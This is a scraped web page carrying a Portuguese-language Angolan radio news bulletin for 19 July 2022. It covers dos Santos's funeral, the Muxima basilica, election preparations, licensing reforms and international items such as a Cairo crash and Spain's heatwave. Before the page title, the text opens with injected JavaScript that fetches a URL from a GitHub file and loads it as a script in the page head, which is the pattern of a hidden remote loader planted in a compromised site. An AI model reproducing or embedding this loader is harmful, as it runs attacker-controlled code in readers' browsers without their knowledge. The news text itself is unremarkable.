;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Notícias ao almoço, edição de 19 de Julho de 2022 | RadioPlayDigital
Notícias ao almoço, edição de 19 de Julho de 2022

Filhos de José Eduardo dos Santos querem que seja edificado um mausoléu, para albergar os restos mortais do seu pai.

Presidente da República lança pedra para a construção da Basílica da Muxima e reconstrução da Vila.

Acidente rodoviário causa mais de vinter mortos no Cairo.

Venezuela pode fornecer petróleo à Europa mas exige pagamento antecipado

Hoje é terça-feira, dia 19 de Julho de 2022. A edição noticiosa é de, Albina Dias. A técnica de, Emanuel Catilina e final de emissão de, Ricardo Dias. Ao microfone estou eu, Sílvio de Abreu.

Ponto

Boa Tarde,

Os filhos mais velhos do antigo presidente José Eduardo dos Santos, comprometeram-se hoje a colaborar na realização do funeral nacional, mas só depois das próximas eleições de 24 de Agosto, e pedem um Mausoléu para acolher os restos mortais do pai.

Numa carta a que a agência Lusa teve acesso, subscrita por cinco dos seus descendentes, Isabel, José Filomeno ‘Zénu’, ‘Tchizé’, Joess, José Eduardo Paulino ‘Coreon Dú’, os filhos de José Eduardo dos Santos, expressam “profunda gratidão ao povo angolano”, e a todos os que partilham a tristeza familiar, e pedem respeito pelo luto.

Na missiva, pode ler-se, “seja qual for o resultado das próximas eleições, no futuro, nós, a família, junto das instituições, e do Presidente eleito, colaboraremos na união da Nação, e na   organização das condições necessárias, para a homenagem e o funeral nacional do Pai da Nação, o nosso pai, o engenheiro José Eduardo dos Santos, para que um dia este em dignidade e respeito, descanse em paz na terra dos seus antepassados.

 Os filhos do Eng. José Eduardo dos Santos, , apelam a todos a respeitarem os nossos costumes, os nossos valores ancestrais, e as nossas crenças religiosas. Dizem que o seu  seu pai tem esse direito, e ninguém o pode contestar”, e salientam que na tradição africana, o tempo de luto, é um tempo de reflexão e reconciliação.

Recorde-se que nesta altura, o governo e os familiares de José Eduardo dos Santos, aguardam pelo desfecho judicial sobre a transladação de Barcelona para Luanda, do corpo do antigo presidente da República para a anunciada realização do funeral de Estado.

Ponto

O presidente da República, João Lourenço lançou hoje a primeira pedra para a requalificação da Vila da Muxima e construção da Basílica da Muxima.

O projecto vai ser edificado no Santuário da Muxima e de acordo com uma fonte eclesiástica, a capela vai ser reabilitada, construindo-se a basílica nas imediações.

Está igualmente prevista a reabilitação do Bairro Coxi, construção de um novo cais, e outras infra estruturas de alojamento e técnicas para conferir mais dignidade aos cristãos, e também para o fomento do turismo religioso.

Na ocasião o arcebispo de Saurimo e presidente da Ceast, Dom Manuel Imbamba destacou a importância da obra, que vai continuar a abençoar o nosso país e promover sentimentos de fraternidade, amor, justiça e bem comum.

R.D.-Dom Manuel Imbamba

Por sua o engenheiro Leonel Pinto da Cruz do Gabinete de Obras Especiais, deu a conhecer que haverá necessidade de desalojar e colocar a população noutra área, nos próximos três anos, mas garantiu que o cadastramento das famílias visadas já foi feito.

R.D.-Leonel Pinto da Cruz

Engenheiro Leonel Pinto da Cruz, do Gabinete de Obras Especiais, durante a cerimónia formal de lançamento da primeira pedra para a construção da Basílica da Muxima, e reabilitação da vila,situada na margem do rio Kuanza.

E A LAC ouviu o pároco da Catedral de Luanda, Antero Beje que manifestou satisfação, pela concretização deste projecto.

R.D1-Antero Beje1

E o pároco da catedral de Luanda, Antero Beje disse à Comercial, que o Santuário da Muxima já é um ponto de turismo internacional e pode contribuir para o desenvolvimento da economia da região.

R.D2.-Antero Beje2

O padre Antero Beja sublinhou que quase todas as províncias de Angola, têm potencial, para o turismo religioso.

R.D3-Antero Beje3

Ponto

Os partidos políticos que concorrem as eleições gerais marcadas para o próximo dia 24 de Agosto, já dispõem do mapeamento das assembleias de votos.

De acordo com o porta- voz da CNE, Lucas Quilundo, que falava à imprensa no termo de uma sessão plenária, também já ficaram definidos os horários, para os tempos de antena, na rádio e televisão públicas.

R.D1-L.Quilundo1

O porta- voz da CNE, também fez referência a lista de observadores eleitorais, que não inclui o “OBEA”, observatório eleitoral de Angola.

R.D2-Lucas Quilundo2

Porta- voz da CNE, Lucas Quilundo em declarações à imprensa, no termo de mais uma sessão daquele órgão, em que deu a conhecer que o Observatório Eleitoral de Angola OBEA, não está habilitado a supervisionar as quintas eleições gerais, por não possuir personalidade jurídica.

E a LAC contactou hoje Luís Jimbo, director executivo do Instituto Angolano de Sistemas Eleitorais e Democracia e Coordenador Nacional do Observatório Eleitoral Angolano que começou por fazer alguns esclarecimentos sobre o assunto.

R.D1-Luís Jimbo1

Luís Jimbo realçou que o OBEA, por via do Instituto dos Sistemas Eleitorais e Democracia solicitou a CNE um encontro para saber da tramitação para a observação eleitoral

R.D.2-Luís Jimbo2

O director executivo do Instituto Angolano de Sistemas Eleitorais e Democracia e Coordenador Naciona do Observatório Eleitoral Angolano, diz ter recebido com estranheza a notícia de que o OBEA foi excluído da observação eleitoral, antes de ter formalizado o pedido.

R.D3-Luís Jimbo3

Luís Jimbo, director executivo do Instituto Angolano de Sistemas Eleitorais e Democracia e Coordenador Naciona do Observatório Eleitoral Angolano, em declarações hoje à Comercial.

Ponto

O alvará comercial passa a ser um documento único e vitalício, e foi alargado o prazo de validade dos alvarás de prestação de serviços de restauração de 3 para dez anos e introduzidas inovações também na licença de industrial.

As alterações surgem na sequência da reunião de ontem da Comissão Interministerial para a Reforma do Estado que decidiu igualmente que as obras de pequena dimensão de particulares, precisem de um único documento, conforme anunciou, o Secretário do Presidente da República para a Reforma do Estado, Pedro Fiete.

R.D.-Pedro Fiete1

O responsável revelou igualmente que já não será preciso homologar certificados de habilitações, no Instituto Nacional de Avaliação, Acreditação e Reconhecimento de Estudos do Ensino Superior (INAAREES).

R.D.-Pedro Fiete2

Outra novidade é o facto de em breve começar a ser emitido um único documento, em que constem todos os dados sobre propriedade automóvel.

R.d.3-Pedro Fiete

Pedro Fiete, Secretário do Presidente da República para a Reforma do Estado.

E o director do Instituto Para a Modernização da administração deu a conhecer o roteiro para a transição digital nos serviços públicos, tornando-os mais eficazes e próximos dos cidadãos.

RD.-Meick afonso

Meick Afonso, director do Instituto Para a Modernização da administração.

Ponto

Da Actualdade Internacional,

…………………………………

Vinte e duas pessoas morreram e trinta e uma ficaram hoje feridas, quando um autocarro colidiu com um veículo pesado de mercadorias numa estrada a sul da capital, Cairo,  disseram as autoridades egípcias.

De acordo com as primeiras informações, o autocarro chocou contra a parte traseira de um camião, que estava parado numa estrada, quando o condutor do camião procedia à mudança de um pneu do veículo.

Os acidentes rodoviários no Egipto são muito frequentes, e provocam a morte a milhares de pessoas todos os anos, devido às más condições das estradas, excesso de velocidade, condições dos veículos, e falta de cumprimento das normas de circulação. De acordo com os dados oficiais, em 2021 morreram mais de seis mil pessoas em acidentes de viação no Egipto.

O presidente do parlamento são-tomense, Delfim Neves, propôs o adiamento para Janeiro, das eleições legislativas, autárquicas e regionais, marcadas para 25 de Setembro, para permitir a realização do recenseamento eleitoral, mas o Presidente da República, Carlos Vila Nova rejeitou.

O presidente da Assembleia Nacional de São Tomé e Príncipe, afirmou que “esta proposta, foi apresentada numa perspectiva de consenso nacional”, durante um encontro na passada semana, convocado pelo chefe de Estado, Carlos Vila Nova, em que participou também o primeiro-ministro, Jorge Bom Jesus.

O presidente do parlamento santomense, disse que ao apresentar a proposta, sublinhou que “revogar um decreto já publicado e fazer outro”, significaria marcar uma nova data para a prorrogação do mandato dos deputados, e realizar as eleições em Janeiro do próximo ano, mas a proposta foi recusada pelo Chefe de Estado.

Mais de 500 pessoas morreram entre os dias 10 e 16 de Julho em Espanha, devido às altas temperaturas que se fizeram sentir, revela a agência de Notícias EFE, que cita dados do Instituto de Saúde Carlos Tereiro.

A onda de calor durou nove dias – onde se registaram temperaturas máximas entre os 39 e os 45ºC -, chegou ontem ao fim, registando-se agora uma descida de temperatura entre os quatro e os oito graus.

Estima-se que a maioria das vítimas mortais, mais de trezentas, tenham mais de 80 anos. A Agência Estatal de Meteorologia Espanhola, afirma que esta nova onda de calor tem sido “excepcional” e que, apesar de se aproximar do fim, ainda se registam altas temperaturas em vários locais de Espanha. 

A Venezuela está disposta a fornecer petróleo e gás à Espanha e ao resto da Europa, mas com pagamento antecipado e através de um mecanismo que permita ao Governo, alvo de sanções internacionais, usar esses recursos.

O anúncio foi feito pelo vice-presidente do Partido Socialista Unido da Venezuela (PSUV, o partido do Governo), Diosdado Cabello, o segundo homem mais forte do chavismo, depois do Presidente Nicolás Maduro.

A Venezuela tem petróleo, não apenas para a Espanha, mas também para a Europa (…) mas têm que pagá-lo. E terão de pagar ao preço que é, e dadas as circunstâncias terão que pagar antecipadamente (…) e num mecanismo que permita à Venezuela utilizar os recursos que vão pagar por esse petróleo”, disse, durante uma conferência de imprensa em Caracas.

O antigo ministro britânico das Finanças Rishi Sunak reforçou o estatuto de favorito na eleição para a liderança do Partido Conservador após uma terceira volta realizada hoje, na qual o deputado Tom Tugendhat foi eliminado. 

De acordo com Graham Brady, presidente do Comité 1922, o conselho dos deputados que organiza as eleições para a liderança, passaram à quarta volta Rishi Sunak (115 votos), Penny Mordaunt (82), a ministra dos Negócios Estrangeiros Liz Truss (71) e a secretária de Estado da Igualdade Kemi Badenoch (58)

Tugendhat foi eliminado por ter sido o menos votado (31 votos).

Nos últimos dias, dois debates televisivos revelaram não só diferenças de opinião sobre cortes fiscais, políticas ambientais ou o reconhecimento oficial de pessoas transgénero, mas também um grande distanciamento do atual primeiro-ministro. 

 

Data de Emissão: 19-07-2022 às 12:30
Género(s): Noticiário
 
PUB RADIO PLAY

Relacionados